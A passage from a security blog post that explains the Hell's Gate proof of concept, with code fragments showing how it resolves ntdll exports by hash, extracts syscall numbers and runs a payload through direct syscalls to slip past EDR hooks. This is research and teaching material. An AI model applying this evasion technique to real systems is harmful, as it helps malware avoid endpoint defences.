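                              offsetof(mock_ldr_entry, InMemoryOrderLinks));
}
```

On a 64-bit build, offsetof(mock_ldr_entry, InMemoryOrderLinks) evaluates to 0x10, which is the constant the POC subtracts. Windows headers provide the CONTAINING_RECORD macro for the same purpose.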
// Get the EAT of NTDLL
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
return 0x01;
Now, we call the GetImageExportDirectory function to access the EAT of ntdll.dll.
VX_TABLE Table = { 0 };
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
return 0x1;
First, the initialisation { 0 } sets all members of the VX_TABLE structure to zero. As an example for all four functions, the dwHash member of the VX_TABLE entry NtAllocateVirtualMemory is set to the corresponding djb2 hash. Next, the GetVxTableEntry function is called. Remember that this function is used to get the absolute address of the corresponding function (in this case NtAllocateVirtualMemory) in the memory of ntdll.dll. The GetVxTableEntry function is also responsible for doing the opcode comparison, extracting the SSN of the native function and storing it in wSystemCall, provided the comparison was successful, i.e. the native function is not hooked. Once all four entries are filled, the Payload function is executed, which uses the externally declared HellsGate and HellDescent functions to execute the direct syscalls to allocate virtual memory, change the memory protection, create a thread, etc.
Summary
In this blog post we took a closer look at the Hell's Gate code and saw how Hell's Gate enables the execution of direct syscalls by dynamically retrieving the SSNs from ntdll.dll without using the GetModuleHandleA and GetProcAddress APIs. In general, the opcode comparison to extract the SSNs from ntdll.dll can still be used, but it is not recommended, because if the EDR hooks any of the native functions used in the POC, Hell's Gate fails. Therefore, Sektor7 created an evolution of Hell's Gate called Halos Gate. In comparison to Hell's Gate, Halos Gate can dynamically retrieve SSNs from ntdll.dll even if the function is hooked by an EDR. In addition, the POC Tartarus Gate uses the same concept as Halos Gate.
Happy Hacking!
Daniel Feichter @VirtualAllocEx